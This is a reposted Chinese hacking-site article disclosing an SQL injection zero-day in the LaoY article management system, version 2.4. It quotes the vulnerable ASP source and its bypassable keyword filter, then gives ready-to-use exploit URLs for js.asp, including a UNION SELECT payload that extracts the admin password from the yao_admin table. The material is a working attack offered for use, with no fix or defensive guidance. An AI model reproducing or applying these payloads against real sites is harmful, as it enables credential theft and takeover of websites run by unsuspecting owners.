老Y文章管理系统注射0day[网络技术]
本文“老Y文章管理系统注射0day[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
幻泉[B.S.N] 黑客防线
Code:
If CheckStr(Request("ClassNo")) <> "" then
ClassNo = split(CheckStr(Request("ClassNo")),"|")
'这里是获得变量操纵checkstr过滤,但是感受仿佛没起作用.然后分成数组
on error resume next
NClassID = LaoYRequest(ClassNo(0))
NClassID1 = LaoYRequest(ClassNo(1))
'获得数组1,与数组2举行整形过滤.这里没有漏洞
End if
num = LaoYRequest(request.querystring("num"))'这里num必须>=1
.......
set rs=server.createObject("Adodb.recordset")
sql = "Select top "& num &" ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"
If NclassID<>"" and NclassID1="" then
If Yao_MyID(NclassID)="0" then
SQL=SQL&" and Class"
else
MyID = Replace(""&Yao_MyID(NclassID)&"","|",",")
SQL=SQL&" and ClassID in ("&MyID&")"
End if
elseif NclassID<>"" and NclassID1<>"" then
MyID = Replace(""&Request("ClassNo")&"","|",",")
SQL=SQL&" and ClassID in ("&MyID&")"
'这里呈现的问题classno并没做其他过滤就写入到查询
End if
select case topType
case "new" sql=sql&" order by DateAndTime desc,ID desc"
case "hot" sql=sql&" order by hits desc,ID desc"
case "IsHot" sql=sql&" and IsHot = 1 order by ID desc"
end select
set rs = conn.execute(sql)
if rs.bof and rs.eof then
str=str+"没有符合条件的文章"
........
-------------------------------
function.asp
Code:
function CheckStr(str)
CheckStr=replace(replace(replace(replace(str,"<","<"),">",">"),chr(13),"")," ","")
CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")
CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")
CheckStr=replace(replace(replace(replace(replace(CheckStr,"*",""),"=",""),"or",""),"mid",""),"count","")
end function
操纵代码:
js.asp?num=1&ClassNo=1|1|1[SQL]
js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1 ####获得密码代码
备注:本漏洞在2.4版本测试 站长站下载地址http://down.chinaz.com/soft/23126.htm
以上是“老Y文章管理系统注射0day[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |